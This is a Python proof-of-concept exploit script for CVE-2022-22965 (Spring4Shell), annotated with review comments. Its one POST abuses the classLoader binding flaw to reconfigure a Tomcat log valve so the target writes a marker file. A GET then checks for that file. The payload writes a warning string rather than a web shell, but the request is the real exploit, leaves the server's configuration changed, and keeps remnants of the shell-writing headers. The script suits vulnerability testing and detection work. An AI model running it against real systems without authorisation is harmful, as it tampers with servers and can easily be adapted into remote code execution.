Safer_PoC_CVE-2022-22965.py
#coding:utf-8
# POC modified by @th3_protoCOL
import requests
import argparse
from urllib.parse import urljoin
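def Exploit(url, dir):
    """Probe *url* for CVE-2022-22965 by making it write a marker text file.

    One POST sets five ``class.module.classLoader...pipeline.first.*``
    properties (pattern, suffix, directory, prefix, fileDateFormat). One GET
    then fetches ``CVE_2022_22965_exploited.txt`` and compares its first 49
    characters with the marker text. Progress and the verdict are printed;
    nothing is returned, and any exception is reported as a failed attempt.

    Args:
        url: Full URL of the endpoint that receives the POST.
        dir: Value substituted for ``out_dir`` in the request body, i.e. the
            directory on the target in which the marker file is written.

    Artefacts on the target: this function never sets the changed properties
    back, and the file with prefix ``CVE_2022_22965_exploited`` and suffix
    ``.txt`` is left in *dir*.
    NOTE(review): presumably the changed properties stay active until they are
    reset or the application is restarted - confirm, and restore the target
    after a test run.
    """
    # NOTE(review): the pattern in `data`, as written, contains no %{name}i
    # header references, so "suffix", "c1" and "c2" look unused - confirm.
    headers = {
        "suffix": "%>//",
        "c1": "Runtime",
        "c2": "<%",
        "DNT": "1",
        "Content-Type": "application/x-www-form-urlencoded",
    }
    # Every parameter name starts with "class.module.classLoader"; that prefix
    # in a request body is what a log or WAF rule can match on.
    data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=i%20Warning,%20CVE_2022_22965%20was%20sucessfully%20exploited%20on%20this%20device.%20reference:%20https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement%20%20i&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.txt&class.module.classLoader.resources.context.parent.pipeline.first.directory=out_dir&class.module.classLoader.resources.context.parent.pipeline.first.prefix=CVE_2022_22965_exploited&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
    # dir is inserted verbatim, without URL-encoding, so "&" or "=" in it
    # would change the structure of the form body.
    data = data.replace("out_dir", dir)
    marker = 'Warning, CVE_2022_22965 was sucessfully exploited'
    try:
        print(f"[*] Full target URL {url}")
        print("[*] Perfoming exploit POST request... ")
        # verify=False turns certificate validation off for both requests, so
        # the responses printed below are not authenticated.
        go = requests.post(
            url,
            headers=headers,
            data=data,
            timeout=15,
            allow_redirects=False,
            verify=False,
        )
        print("\033[1;33m[*]\033[0m Exploit attempt finished")
        print(f"[*] Exploit attempt status code: {go.status_code}")
        print("[*] Preview of response: ")
        print(go.text[:120])
        # urljoin replaces the last path segment of url, so the file is looked
        # up next to the endpoint, which need not be where *dir* is served.
        result_url = urljoin(url, 'CVE_2022_22965_exploited.txt')
        # Same 15 s limit as the POST: without a timeout this call can block
        # indefinitely on an unresponsive host.
        results_check = requests.get(result_url, timeout=15, verify=False)
        print(f"[*] Evidence pull status code: {results_check.status_code}")
        # NOTE(review): the pattern in `data` begins with a literal "i " before
        # "Warning", while this comparison expects the body to start with
        # "Warning" - confirm the automatic check can match at all.
        if results_check.status_code == 200 and results_check.text.startswith(marker):
            print("\033[0;32m[+] Exploit successful! \033[0m")
            print(f"[*] URL path: {result_url}")
        else:
            print("\033[93m[!] Manual verification needed!\033[0m\n[*] Check the results of the exploit by reviewing for the presence \033[1;36mCVE_2022_22965_exploited.txt\033[0m on your webserver!" )
            print(f"\033[93m[*] Preview of {result_url}\033[0m")
            print(results_check.text[:200])
    except Exception as e:
        # Best-effort tool: report the error and return instead of crashing.
        print("\033[0;31m[-] Exploit Failed\033[00m")
        print(e)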
def main():
    """Read --url and --dir from the command line and pass them to Exploit."""
    cli = argparse.ArgumentParser(
        description='CVE-2022-22965 Spring-Core remote code execution POC',
    )
    cli.add_argument('--url', required=True, help='target url')
    # --dir is optional and falls back to "webapps/ROOT".
    cli.add_argument(
        '--dir',
        default="webapps/ROOT",
        help='directory to write the result (default is "webapps/ROOT")',
    )
    opts = cli.parse_args()
    Exploit(opts.url, opts.dir)
# Start the command-line interface only when run as a script, not on import.
if __name__ == "__main__":
    main()